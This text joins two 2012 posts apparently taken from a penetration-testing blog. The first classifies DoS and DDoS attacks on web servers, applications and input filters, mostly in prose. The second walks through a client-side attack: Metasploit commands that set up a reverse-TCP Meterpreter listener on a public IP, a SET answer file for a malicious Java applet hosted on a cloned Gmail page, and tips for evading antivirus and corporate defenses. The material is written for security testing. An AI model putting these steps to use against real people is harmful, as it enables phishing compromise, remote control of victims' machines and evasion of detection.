A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:<br />
<ol>
<li>Consumption of computational resources, such as bandwidth, disk space, or processor time.</li>
<li>Disruption of configuration information, such as routing information.</li>
<li>Disruption of state information, such as unsolicited resetting of TCP sessions.</li>
<li>Disruption of physical network components.</li>
<li>Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.</li>
</ol>
A DoS attack may include execution of malware intended to:<br />
<ol>
<li>Max out the processor's usage, preventing any work from occurring.</li>
<li>Trigger errors in the microcode of the machine.</li>
<li>Trigger errors in the sequencing of instructions, so as to force the computer into an unstable state or lock-up.</li>
<li>Exploit errors in the operating system, causing resource starvation and/or thrashing, i.e. to use up all available facilities so no real work can be accomplished.</li>
<li>Crash the operating system itself.<b> </b> </li>
</ol>
<b>Note: </b>The definition of the DoS and DDoS attack was taken directly from Wikipedia (the link can be located at the bottom of the article). Wikipedia has a very good definition of what DoS and DDoS attack is, what is missing is how can these conditions (1 through 5) can happen in 2012 (which I think it is out of scope of the wiki article anyway), meaning that the article is outdated and does not cover all conditions because it is reducing the attack surface to the machines surrounding the victim machine, the operating system (OS) of the victim machine and hardware of the victim machine. <br />
<b><br /></b>
<b>Defining a valid DoS and DDoS attack surface </b><br />
<b><br /></b>
When I am referring to the attack surface of a DoS or DDoS attack I mean the components someone should be attacking in a Web Application. The components are: <br />
<ol>
<li>The Web Application.</li>
<li>The Web Application Platform.</li>
<li>The Web Server. </li>
</ol>
<b>Note:</b> Each component has it own peculiarities and has to be treated differently in order to have the best possible outcome.<br />
<br />
Special care should also be taken into consideration when attacking each layer separately and of course a detailed auditing of the engaged technologies must be conducted before launching the attack. What I mean is that based on the type of the attack planned and the way the Web system behaves a relatively complex customized DoS or DDoS attack can be launch in a highly effective manner (you will understand later what I mean by saying that).<br />
<br />
The following picture shows how different vulnerabilities can be associated with each layer and cause a DoS attack:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK-7FtuhJYKSFsowRrx9ZsUj0LqdYMykMFZMV4iwGxFn5U9UHLDO73FLCl2nWJmrN5gdOijFmxtN77pDFzHwolcYxorY3car0BRD8Q98k6MQOBmpYvoEhLKjq3CNCiAyQ_ZZfjgo9N0YY/s1600/neworig21302.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK-7FtuhJYKSFsowRrx9ZsUj0LqdYMykMFZMV4iwGxFn5U9UHLDO73FLCl2nWJmrN5gdOijFmxtN77pDFzHwolcYxorY3car0BRD8Q98k6MQOBmpYvoEhLKjq3CNCiAyQ_ZZfjgo9N0YY/s1600/neworig21302.png" width="640" /></a></div>
<br />
<b>Note:</b> The above diagram shows how combined attacks to all three layers of the target server can be used to amplifie a DoS or DDoS attack and make it practically unstoppable. Imagine an advanced attacker launching an attack like that (meaning combining all different type of vulnerabilities).<br />
<br />
A generic low tech DoS attack might be easy to defeat when proper countermeasures are taken, but what happens when the attacker knows also the counter measures for the counter measures a defender would use? Well you might be confused now, but hopefully you will understand what I mean later on.<br />
<b><br /></b>
<b>DoS-ing the Web Application Server </b> <br />
<b><br /></b>
A number of well documented and known, but <u>not so interesting attacks</u> can be launched in a Web Server level by simply performing one of the well known and famous attacks named below (this is a sample of the total amount of DoS and DDoS attack types someone can use against a Web Server):<br />
<ul>
<li><b>ICMP flood also known as Smurf attack</b></li>
<ul>
<li>A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. </li>
</ul>
</ul>
<b>Note: </b>This is an outdated attack and most of the time is not going to be feasible to high profile targets such as important US government web sites for example. But can be used for diversion e.g. flooding surrounding machines along with the target machine might confuse the intrusion prevention middle device (simplistically speaking of course) about the network source of the attackers.<br />
<ul>
<li><b>SYN flood</b></li>
<ul>
<li>A SYN flood occurs when a host sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet (Acknowledge), and waiting for a packet in response from the sender address (response to the ACK Packet). </li>
</ul>
</ul>
<div>
<b>Note:</b> This is an old and well documented attack that is also not very interesting and counter measures exist for years about this specific attack from various vendors. </div>
<ul>
<li><b>SSL DoS</b></li>
<ul>
<li>SSL-DoS exploits an SSL design flow by overloading the server and knocking it off the Internet.This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection.</li>
</ul>
</ul>
<div>
<b>Note: </b>Establishing a secure SSL connection requires 15x more processing power on the server than on the client, which implies that an asymmetric resource starvation attack will happen.</div>
<div>
<ul>
<li><b>Buffer Overflow DoS Attacks</b></li>
<ul>
<li>The data transferred to a user input buffer exceeds the storage capacity of the buffer and some of the data overflows into another buffer, one that the data was not intended to go into. Since buffers can only hold a specific amount of data, when that capacity has been reached the data has to flow somewhere else, typically into another buffer, which can corrupt data that is already contained in that buffer. This can be elevated to remote command shell that would give the attacker to remotely shutdown or reboot the system or simply crash the underlaying operating system. </li>
</ul>
</ul>
</div>
<div>
<b>Note:</b> Again this type of attack is considered to be a relatively advanced type of attack especially when zero day exploits are used, it also implies that an asymmetric DoS attack can happen. </div>
<div>
<br /></div>
<b>DoS-ing the Web Application and Application platform</b><br />
<br />
A DoS attack can also happen in a Web Application or Web Application platform layer. These types of attacks are usually very rear or do not become public most of the time, I call them low publicity DoS and DDoS attacks. The complexity of these attacks is significantly higher than the previous ones if you exclude the Buffer Over flow and SSL DoS attacks (when you don't use online hacking tools). The concept behind these type of attacks is that the attacker has to have knowledge of the Web Application input validation filters. In order for me to be more clear I will list below the ones I consider the most popular input validation DoS and DDoS attacks:<br />
<ul>
<li><b>SQL Injection DoS attack</b></li>
<ul>
<li>SQL injection is a technique often used to attack a website. This is done by including portions of SQL statements in a Web Application user or none user entry point in an attempt to get the website to pass a newly formed rogue SQL command to the database, now if the injected command contains a valid SQL shutdown command then the outcome would be to for the database to shutdown, crashing the Web System under attack.</li>
</ul>
</ul>
<b>Note: </b>Obviously someone can perform an <u>asymmetric DoS attack</u> of this type. You should also take into consideration the fact that an attacker can exploit the same way also a blind SQL injection. A Web Application firewall would not stop a SQL Injection DoS attack if the attacker obfuscates her SQL payloads (for more information on the subject see <a href="http://securityhorror.blogspot.ie/2012/06/obfuscate-sql-fuzzing-for-fun-and.html" target="_blank">previous posts</a>). <br />
<ul>
<li><b>Directory traversal DoS or DDoS attack</b></li>
<ul>
<li>A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs, also directory traversal attacks can be expanded through bad privilege assignment. Being able to <u>request large size files</u> from the host operating system is usually something that is going to slow down significantly Web Application performance and that is something the Web Application was initially not designed for. </li>
</ul>
</ul>
<b>Note:</b> This type of attack is likely to be successful in a DDoS type of attack. Imagine multiple users requesting the /dev/random in a unix-like operating system. For more information on obfuscating path traversal check this <a href="http://code.google.com/p/teenage-mutant-ninja-turtles/wiki/AdvancedObfuscationPathtraversal?ts=1350980063&updated=AdvancedObfuscationPathtraversal" target="_blank">link</a>.<br />
<ul>
<li><b>External Entity Injection DoS attack </b></li>
<ul>
<li>An External Entity Injection (XXE) is generally speaking a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromise the security of a web application. Now days is rear to find this types of security issues. This type of attack is well documented and known since 2002. By exploiting an XXE injection you can perform a similar attack to the directory traversal DoS attack by loading large size documents. </li>
</ul>
</ul>
<b>Note:</b> Again imagine an attacker requesting large size file from the hosting operating system and specially in unix-like operating systems the /dev/random file.<br />
<ul>
<li><b>Web Application Design DoS Attack</b></li>
<ul>
<li>A Web Application design DoS attack (WADD) is feasible when the Web Application does not take into consideration how a Web Application behaves when thousands of malicious payload are send. This type of attack also has to do with Web filter malicious payload processing time, for example a Buffer Overflow payloads would probably increase Web filter processing time. </li>
</ul>
</ul>
<b>Note:</b> Imagine an advanced attacker brute forcing Web Application user accounts connected directly to an Active Directory Server. If the Web Application does not have a proper lock out mechanism then Active Directory accounts will be locked.<br />
<br />
The picture below shows a schematic representation of all three attacks mentioned above:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6wzE1fdvxI3IlYq-3TXsKOR_-LObDPNXLK3XIKWxPr8i_EWUMA5i26wxyu9B8vmavPNXxFVh55WbTXEWs4SAhtGFFfahLxxpgeMmn_FJ6bMk8WgJTphbMcTegi8OiNE7kzEFVbPbyC64/s1600/neworig23194.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6wzE1fdvxI3IlYq-3TXsKOR_-LObDPNXLK3XIKWxPr8i_EWUMA5i26wxyu9B8vmavPNXxFVh55WbTXEWs4SAhtGFFfahLxxpgeMmn_FJ6bMk8WgJTphbMcTegi8OiNE7kzEFVbPbyC64/s1600/neworig23194.png" /></a></div>
<br />
<b>Note: </b> See that at the diagram above the Web filter is particularly emphasized.<br />
<br />
By now you should be able to understand that in most occasions when someone is fuzzing the Web Application parameters, then the corresponding server http response, to the malicious http request is going to start vary as far as the time delay is concerned. One of the desired side effects of that process would be be the increase of your chance to randomly crash the Web Application if the Web Application is not vulnerable to any of the Web Application layer mentioned above (it should be noted at this point that this is a conclusion based on my experience and I don't keep keep statistics of the crushed Web Applications).<br />
<br />
The diagram below shows a schematic representation of how a web filter is DoS attacked:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi99fFF9b4bgsPIMIDFSZB7Abxf03eOmoNA5MjwaVkUD50Qv6y6wlUIxMzlftqojVLCUU2c57FlqVIrjLRGK-Mdfy7tnchohokjC4ORopCwrO_WSdANVdUiKDx4UsW3P2rXMooae44qSB4/s1600/neworig26757.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi99fFF9b4bgsPIMIDFSZB7Abxf03eOmoNA5MjwaVkUD50Qv6y6wlUIxMzlftqojVLCUU2c57FlqVIrjLRGK-Mdfy7tnchohokjC4ORopCwrO_WSdANVdUiKDx4UsW3P2rXMooae44qSB4/s1600/neworig26757.png" /></a></div>
<b><br /></b>
<b>Note: </b>A Web Application that does not use Web filters at all is possibly vulnerable to one or more of the vulnerabilities mentioned above. A Web Application that does use Web filters might be vulnerable to a Web filter DoS attack.<br />
<br />
<b>DoSing the Web filters</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Web filtering is very important in a Web Application. Imagine a regular expression performing white list filtering in the server side, filtering thousands of malicious http requests. The processing time of the malicious request can dramatically increase if the implementation of the filter is bad, for example if you have a Web Application field that excepts as an input a three digit number then the Application should stop processing that request after 10 first failed attempts, in fact during none production functional testing (e.g. load stress tests) a Web Application might cause DoS/DDoS attack to itself due to bad Web Application filtering. You may also encounter filters which, rather than blocking input containing the items in the preceding list, attempt to modify the input to make it safe, either by encoding or escaping problematic characters or by stripping the offending items from the input and processing what is left in a normal way. Simplistically speaking an application should understand when it is being attacked and reject incoming traffic from the malicious ip (e.g. bind session with ip).<br />
<br />
The following diagram shows a conceptual representation of what I mean: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht9vSvYM6ooAt_0ADYO8Jzm6TcxVMLBegnpjHtKO5aM8S0yxpS8MzzF17ZYergyMNeEUKTtDgGD8HcUN2_0vuz1SA8AJEu8hkuWxp4fSw-wkQpExASUGO1FOL6XaeIUxOpxgWAKlDpMa4/s1600/neworig31424.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht9vSvYM6ooAt_0ADYO8Jzm6TcxVMLBegnpjHtKO5aM8S0yxpS8MzzF17ZYergyMNeEUKTtDgGD8HcUN2_0vuz1SA8AJEu8hkuWxp4fSw-wkQpExASUGO1FOL6XaeIUxOpxgWAKlDpMa4/s1600/neworig31424.png" /></a></div>
<br />
<b>Note: </b>The malicious http request is rejected immediately after it meets the specific criteria of being characterized as malicious.<br />
<br />
<b>Combining all DoS attack types together</b><br />
<b><br /></b>
An advanced attacker when combining all the DoS and DDoS attacks explained above would definitely have very good results in compromising the availability of the target server. A combined attack would have the desired results listed below:<br />
<ol>
<li>Decrease of the amount of the attacking machines required to bring down the server, since asymmetric and symmetric types of DoS attacks are engaged.</li>
<li>Decrease of the amount of time needed to crash the server since the attack is multi-layered, taking advantage of a larger number of vulnerabilities identified in the server.</li>
<li>Increase the amount of time of remediation due to the complexity of the attack, therefor increasing the server down time. </li>
</ol>
<b>Prevention and response</b><br />
<br />
Defending against Denial of Service attacks typically involves the use of a combination of attack detection, traffic classification and response tools, aiming to block traffic that they identify as illegitimate and allow traffic that they identify as legitimate. But in a situation of a combined attack such as the one above there is not much that can be done. My assumption is that a combination of properly configured Intrusion Prevention System, Web Application Firewall and Database Application Firewall might prevent a DoS or DDoS attack such as the one I described above. <br />
<b><br /></b>
<b>References:</b><br />
<ol>
<li><a href="http://en.wikipedia.org/wiki/Denial-of-service_attack" target="_blank"><b> </b>http://en.wikipedia.org/wiki/Denial-of-service_attack</a></li>
<li><a href="http://stop-ddos.net/en/blog/article/11">http://stop-ddos.net/en/blog/article/11</a> </li>
<li><a href="http://www.securitybistro.com/blog/?p=2500">http://www.securitybistro.com/blog/?p=2500</a> </li>
<li><a href="http://www.theregister.co.uk/2012/04/12/prolexic_ddos_trends/">http://www.theregister.co.uk/2012/04/12/prolexic_ddos_trends/</a></li>
<li><a href="http://www.thc.org/thc-ssl-dos/">http://www.thc.org/thc-ssl-dos/</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-39543314754769035342012-09-08T14:34:00.002-07:002012-09-10T10:30:16.979-07:00Industrializing Client Side Attacks <b>Introduction</b><br />
<br />
Cybercrime has evolved into an industry whose value in fraud and stolen property exceeded one trillion dollars in 2009. By contrast, in 2007, professional hacking represented a multibillion-dollar industry. What explains this rapid growth? Industrialization. Just as the Industrial Revolution advanced methods and accelerated assembly from single to mass production in the 19th century, today’s cybercrime industry has similarly transformed and automated itself to improve efficiency, scalability, and profitability.<br />
<br />
The industrialization of hacking coincides with a critical shift in focus. Previously, hackers concentrated attacks on breaking perimeter defences. But today, the goal has changed. The objective is no longer perimeter penetration and defense. Today’s hacker is intent on seizing control of data and the applications that move this data. This is why attacks against Web applications constitute more than 60 percent of total attack attempts observed on the Internet.<br />
<br />
<b>Today's Hacking Scene</b> <br />
<br />
Today’s complex hacking operation now utilizes teamwork, global coordination, and sophisticated criminal techniques designed to elude detection. In recent years, a clear definition of roles and responsibilities has developed within the hacking community forming a supply chain that resembles that of a drug cartel. Additionally, the machine of choice is the botnet – armies of unknowingly enlisted computers controlled by hackers. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. Researchers estimate that some 14 million computers have already been enslaved by botnets. <br />
<br />
Improvements in automated and formalized attack tools and services have introduced a new set of security problems for businesses. Of the top 10 data breaches in 2009, half involved stolen laptops, while the other half involved Web and database assaults.<br />
<br />
<b>Client side attacks are on the rise</b><br />
<br />
Client-side vulnerabilities are among the biggest threats facing users, nowadays's there has been a slight shift to the client side because server-side applications have been targets for attackers since 2001, and these applications have matured somewhat. Attackers are also going after weaknesses in desktop applications such as browsers, media players, common office applications and e-mail clients. The remedy is to maintain the most current application patch levels, keep antivirus software updated and seek and remove unauthorized applications.<br />
<br />
<b>Understanding client side attacks</b> <br />
<br />
In order to understand client-side attacks, let us briefly describe server-side attacks that we can contrast to client-side attacks. Servers expose services that clients can interact with. These services are accessible to clients that would like to make use of these services. As a server exposes services, it exposes potential vulnerabilities that can be attacked. Merely running a server puts oneself at risk, because a hacker can initiate an attack on the server at any time. <br />
<br />
Client-side attacks are quite different. These are attacks that target vulnerabilities in client applications that interact with a malicious server or process malicious data. Here, the client initiates the connection that could result in an attack. If a client does not interact with a server, it is not at risk, because it doesn’t process any potentially harmful data sent from the server. <br />
<br />
A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system. Client-side attacks are not limited to the web setting, but can occur on any client/server pairs, for example e-mail, FTP, instant messenging, multimedia streaming, etc.<br />
<br />
Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate server filtering solutions are available, but typically these only protect limited set of client technologies.<br />
<br />
<b>Drop-ing the payload</b><br />
<br />
There are various way an a attacker can drop her payload to the targeted workstation or laptop, some of them are listed below:<br />
<ol>
<li>Through clicking evil links hiding malicious payloads hold on a malicious server controlled by the attacker.</li>
<li>Through vulnerable web servers by either compromising them or exploiting vulnerabilities on them.</li>
<li>Through Man In The Middle attacks.</li>
<li>Through phishing e-mails also holding malicious payloads.</li>
<li>Through various other attacks that are out of the scope of this article.</li>
</ol>
The following image shows one of the most popular ways to <i>"seduce" </i>a user into clicking on a malicious web site:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaspRDp99PLR6G5IZ0kp97tyTjr4zS8ZWrWqANS30Bb6nkIPX8Ssb_1szezXA54_WAo6F3SgjrSpmgKsdaIMO4GzveBRORCVFNGkBmviMaP8LF8NjdO4JS3DJ0TjnEEFMeIOqkgELKZxk/s1600/Drawing1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaspRDp99PLR6G5IZ0kp97tyTjr4zS8ZWrWqANS30Bb6nkIPX8Ssb_1szezXA54_WAo6F3SgjrSpmgKsdaIMO4GzveBRORCVFNGkBmviMaP8LF8NjdO4JS3DJ0TjnEEFMeIOqkgELKZxk/s1600/Drawing1.png" /></a></div>
<br />
<b>Note: </b>This is an old fashioned attack approach, very well replicated by the penetration testing community during hacking attack. Of course social engineering is also used through out that process.<br />
<br />
<b>The actual attack simplified </b><br />
<b><br /></b>
All you need to perform this type of attack is the Social Engineering Toolkit (SET) and Metasploit, well not exactly, that is not true if you are targeting high profile targets. But first lets explain the simplified version of the attack. In order the perform client side attack to a user that is NOT protected by some serious hardening such as a reverse SSL proxy with content inspection features and a firewall with proper egress filtering then the tools mentioned above will do the job. By using the tools described above the following steps have to be taken:<br />
<ol>
<li>Set up a listener bind to a public IP or DNS name.</li>
<li>Demonize the listener. </li>
<li>Research the victims laptop software and hardware. </li>
<li>Social engineer the user to download and execute it to her laptop.</li>
<li>Use proper payloads for post exploiting the victim. </li>
</ol>
<b>Note:</b> Again this is a simplified attack sequence and is not going to work in a laptop or workstation that is hardened and the user is not allowed to install software.<br />
<br />
<b>Setting up the listener</b><br />
<br />
So after we successfully generate the desired payload,using SET, and verify that it is a valid payload, by issuing the commands listed below we move forward on how to launch the handler on the attackers machine, so in order to do that we type the following commands in the order given below:<br />
<ol>
<li>cd /pentest/exploits/framework3</li>
<li>./msfconsole </li>
<li>msf > use exploit/multi/handler</li>
<li>msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp</li>
<li>msf exploit(handler)> set LHOST publicIP</li>
<li>msf exploit(handler)> set LPORT 123</li>
<li>msf exploit(handler)> exploit -j</li>
</ol>
<b>Note:</b> The attackers machine should be accessible some how from victims machine (e.g. by using a publicly static IP or DynDNS).<br />
<br />
<b>Generating the payload and setting up the clone</b><br />
<br />
SET is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET has a feature called “set-automate” which will take an answer file as an input and enter the commands in the menu mode for you. So for example if I wanted to do the Java Applet I would create a file with the following text:<br />
<br />
1<br />
2<br />
1<br />
<br />
https://gmail.com no<br />
<br />
Now lets name the file mySET.txt, the command that will execute a java applet attack would be:<br />
<br />
root@bt:/pentest/exploits/set# ./set-automate mySET.txt<b> </b><br />
<br />
<b>Note: </b>The described configuration will launch a multiple web-based attack from SET using the Java Applet attack method by embedding a malicious Java Applet to a gmail clone. SET will also launch the listener but it would better if you do it manually.<br />
<br />
<b>After a successful compromise </b><br />
<br />
If the victim is properly social engineered and execute the payload then the meterpreter agent will launch back a remote shell connection. The Meterpreter (short for Meta Interpreter) payload will give an attacker a presence in memory only payload, and reduce the attackers need to touch disk to zero. Metasploit will upload a DLL (Meterpreter) to the remote host; the uploaded DLL will be stored in the compromised processes heap. Meterpreter once loaded offers the attacker a plethora of options.<br />
<br />
Once Meterpreter’s staged shellcode has been executed and Meterpreter has been loaded, communication begins. Meterpreter’s communication and extensibility are what makes it so valuable to an advanced attacker. For the purposes of this article think about the attacker as the client, and the victim as the server.Meterpreter uses a protocol called Type Length Value (TLV).<br />
<br />
<b>Why the above methods wont work on a corporate environment</b><br />
<br />
When referring to a hardened corporate environment a set of prevention technologies is used to protect the user workstations such as anti-virus software, endpoint security software with personal firewall, web gateways performing deep content inspection to non-encrypted connections, reverse SSL proxies filtering all SSL connections that validate certificates and finally IDS/IPS devices are also included. So the reason an amateur will fill is:<br />
<ol>
<li>Many advanced payloads do not work very well running in x86-64 (Windows).</li>
<li>Very restrictive inbound and outbound firewall rules are applied.</li>
<li>Proxy authentication is required for outgoing connections.<b><br /></b></li>
</ol>
<b>Note: </b>These are not the only reasons just the most basic.<b><br /></b><br />
<br />
<b>Bypassing defenses</b><br />
<br />
There are numerous techniques defeating all defenses mentioned above some of them are:<br />
<ol>
<li>Code signing certificate for the payload (e.g. for the Meterpreter executable or the Meterpreter malicious Java Applet).</li>
<li>A SSL certificate from a trustworthy Certificate Authority, for the payload communication protocol.</li>
<li>Use costume communication protocol instead of the one used by the Meterpreter since you don't want to be detected and blocked because you’re mimicking the behavior of a well-known hacking tool.The Metasploit meterpreter reverse_http(s) payload contains the string "Meterpreter" on the User-Agent variable.</li>
<li> Create a custom payload or add your own evasion techniques, this way almost any signature detection system can be bypassed.</li>
<li>Avoid process dll injection while delivering the payload. The latest versions of windows enforce session separation so some of the methods may not work on the latest version of windows like windows 7/8.</li>
</ol>
<b>Why code signing is not secure</b><br />
<br />
Code signing can provide several valuable features. The most common use of code signing is to provide security when deploying; in some programming languages, it can also be used to help prevent namespace conflicts. Almost every code signing implementation will provide some sort of digital signature mechanism to verify the identity of the author or build system, and a checksum to verify that the object has not been modified. It can also be used to provide versioning information about an object or to store other meta data about an object.<br />
<br />
Many code signing implementations will provide a way to sign the code using a system involving a pair of keys, one public and one private, similar to the process employed by SSL or SSH. For example, in the case of .NET, the developer uses a private key to sign their libraries or executables each time they build. This key will be unique to a developer or group or sometimes per application or object. The developer can either generate this key on their own or obtain one from a trusted certificate authority (CA).Of course it is not so difficult to sign a malicious code, unauthorized digital certificates have been found that chain up to a Microsoft sub-certification authority issued under the Microsoft Root Authority that can be used to sign malicious code. <b></b><br />
<b><br /></b>
More specifically components of the Flame malware were found to be signed with a certificate that chained up to the Microsoft Enforced Licensing Intermediate PCA certificate authority, and ultimately, to the Microsoft Root Authority. This code-signing certificate came by way of the Terminal Server Licensing Service that operate to issue certificates to customers for ancillary PKI-based functions in their enterprise. Such a certificate could (without this update being applied) also allow attackers to sign code that validates as having been produced by Microsoft.<br />
<br />
<b>Why valid certificates are not secure</b><br />
<br />
Obtaining a valid certificate and using it with SET is easy. The fact that this is easy can be verified by numerous web site reporting compromised certificates, one of them is this one:<br />
<ul>
<li> <a href="http://www.ccssforum.org/malware-certificates.php">http://www.ccssforum.org/malware-certificates.php</a> </li>
</ul>
This is an extract from the web site with a long list of compromised certificates:<i> "The following is a list of digital certificates that have been reported by the forum as possibly being associated with malware to various certificate authorities. This information is intended to help prevent companies from using digital certificates to add legitimacy to malware and encourage prompt revocation of such certificates."</i><b> </b><br />
<br />
<b>Obfuscating Meterpreter </b> <br />
<br />
It is really easy to obfuscate Meterpreter, in the following post <a href="http://spareclockcycles.org/tag/meterpreter/">http://spareclockcycles.org/tag/meterpreter/</a> the person that owns the blog explains that he/she managed to obfuscate the Meterpreter by writing a XOR program in python. The following extract is from the blog:<br />
<br />
<i>"What surprised me during all of this was how ridiculously easy it is to do just that. About 60 lines of Python (I know, way too many) and 20 lines of C was all it took to take my detection rate from 40% to 1% (32 bit version / 64 bit version). The Python code largely is just to automate things, but it also made the XOR crypting easier and allowed me to more easily embed arbitrary executables in my code (which is useful in embedding other, non-metasploit payloads)."</i><br />
<br />
<b>Epilogue</b><br />
<br />
The drop-ing payload is a very important part of a social engineering attack. If you are doing all the other stages like a professional but use an average payload you won't get the great results you expect. Client-side attacks and social engineering should be included in every penetration testing engagement, if you are not testing for social engineering attacks a very significant attack vector that real hackers use will be skipped. <i> </i> <b><br /></b><br />
<br />
<b>References: </b><br />
<ol>
<li><a href="http://www.scmagazine.com/what-ceos-should-know-about-advanced-persistent-threats-and-industrialized-hacking/article/168534/" target="_blank">http://www.scmagazine.com/what-ceos-should-know-about-advanced-persistent-threats-and-industrialized-hacking/article/168534/ </a><b></b></li>
<li><a href="http://www.google.ie/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDQQFjAD&url=http%3A%2F%2Fwww.imperva.com%2Fdocs%2FWP_Industrialization_of_Hacking.pdf&ei=4INLUOmvNIW2hQfoyoHACA&usg=AFQjCNGK3zxXrOHOIf829XOEPI78FFWcjw&sig2=VzVIvZmXY8--Vwp3ACm9aw&cad=rja">http://www.google.ie/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDQQFjAD&url=http%3A%2F%2Fwww.imperva.com%2Fdocs%2FWP_Industrialization_of_Hacking.pdf&ei=4INLUOmvNIW2hQfoyoHACA&usg=AFQjCNGK3zxXrOHOIf829XOEPI78FFWcjw&sig2=VzVIvZmXY8--Vwp3ACm9aw&cad=rja</a><b></b></li>
<li><a href="http://www.honeynet.org/">http://www.honeynet.org/</a></li>
<li><a href="http://www.networkworld.com/news/2007/112807-client-side-attacks-rise.html" target="_blank">http://www.networkworld.com/news/2007/112807-client-side-attacks-rise.html</a></li>
<li><a href="http://blog.spiderlabs.com/2012/08/client-side-payload-the-brazilian-way.html" target="_blank">http://blog.spiderlabs.com/2012/08/client-side-payload-the-brazilian-way.html</a></li>
<li><a href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29" target="_blank">http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29</a></li>
<li><a href="http://securityxploded.com/dll-injection-and-hooking.php" target="_blank">http://securityxploded.com/dll-injection-and-hooking.php</a></li>
<li><a href="http://en.wikipedia.org/wiki/Code_signing">http://en.wikipedia.org/wiki/Code_signing</a> </li>
<li><a href="http://blogs.technet.com/b/srd/archive/2012/06/03/microsoft-certification-authority-signing-certificates-added-to-the-untrusted-certificate-store.aspx">http://blogs.technet.com/b/srd/archive/2012/06/03/microsoft-certification-authority-signing-certificates-added-to-the-untrusted-certificate-store.aspx</a></li>
<li><a href="http://spareclockcycles.org/tag/meterpreter/">http://spareclockcycles.org/tag/meterpreter/</a></li>
</ol>
<br />
<br />
<br />
<br />
<br />
<br />
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.com